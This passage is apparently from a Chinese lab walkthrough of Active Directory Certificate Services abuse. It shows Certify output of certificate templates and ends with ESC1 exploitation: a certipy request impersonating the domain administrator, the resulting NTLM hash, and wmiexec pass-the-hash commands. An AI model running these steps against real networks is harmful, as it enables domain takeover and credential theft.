mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Microsoft 信任列表签名, 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 文件恢复
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 服务器身份验证, 客户端身份验证
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Computers S-1-5-21-990187620-235975882-534697781-515
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 服务器身份验证, 客户端身份验证
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : 服务器身份验证
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 服务器身份验证, 客户端身份验证, 智能卡登录
mspki-certificate-application-policy : 服务器身份验证, 客户端身份验证, 智能卡登录
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 目录服务电子邮件复制
mspki-certificate-application-policy : 目录服务电子邮件复制
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
mspki-certificate-application-policy : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : LDAPS
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
mspki-certificate-application-policy : KDC 身份验证, 服务器身份验证, 客户端身份验证, 智能卡登录
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Controllers S-1-5-21-990187620-235975882-534697781-516
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
XIAORANG\Enterprise Read-only Domain ControllersS-1-5-21-990187620-235975882-534697781-498
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.6943600

查看设置了 msPKI-Certificate-Name-Flag: (0x1) ENROLLEE_SUPPLIES_SUBJECT 标志的证书模版,利用这个漏洞冒充管理员。

ESC1利用前提条件:
msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT :表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括域管理员用户
PkiExtendedKeyUsage: Client Authentication:表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证
Enrollment Rights: NT Authority\Authenticated Users :表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书

ESC1

利用XR Manager模板为域管请求证书

1
proxychains4 certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager'  -upn administrator@xiaorang.lab

转换格式,请求 TGT,DCSync 或者 PTT

1
'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80

pth横向移动

1
2
proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.26 -codec gbk